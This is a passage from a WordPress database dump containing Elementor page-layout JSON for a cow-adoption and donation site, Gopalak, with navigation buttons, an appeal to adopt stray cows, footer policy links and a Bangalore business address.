namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12107,1990,'_elementor_page_assets','a:0:{}'),(12109,1991,'_elementor_edit_mode','builder'),(12110,1991,'_elementor_template_type','wp-page'),(12111,1991,'_elementor_version','3.7.8'),(12112,1991,'_wp_page_template','elementor_canvas');
INSERT INTO `wp_postmeta` VALUES (12113,1991,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12114,1991,'_elementor_page_assets','a:0:{}'),(12116,1992,'_elementor_edit_mode','builder'),(12117,1992,'_elementor_template_type','wp-page'),(12118,1992,'_elementor_version','3.7.8'),(12119,1992,'_wp_page_template','elementor_canvas'),(12120,1992,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 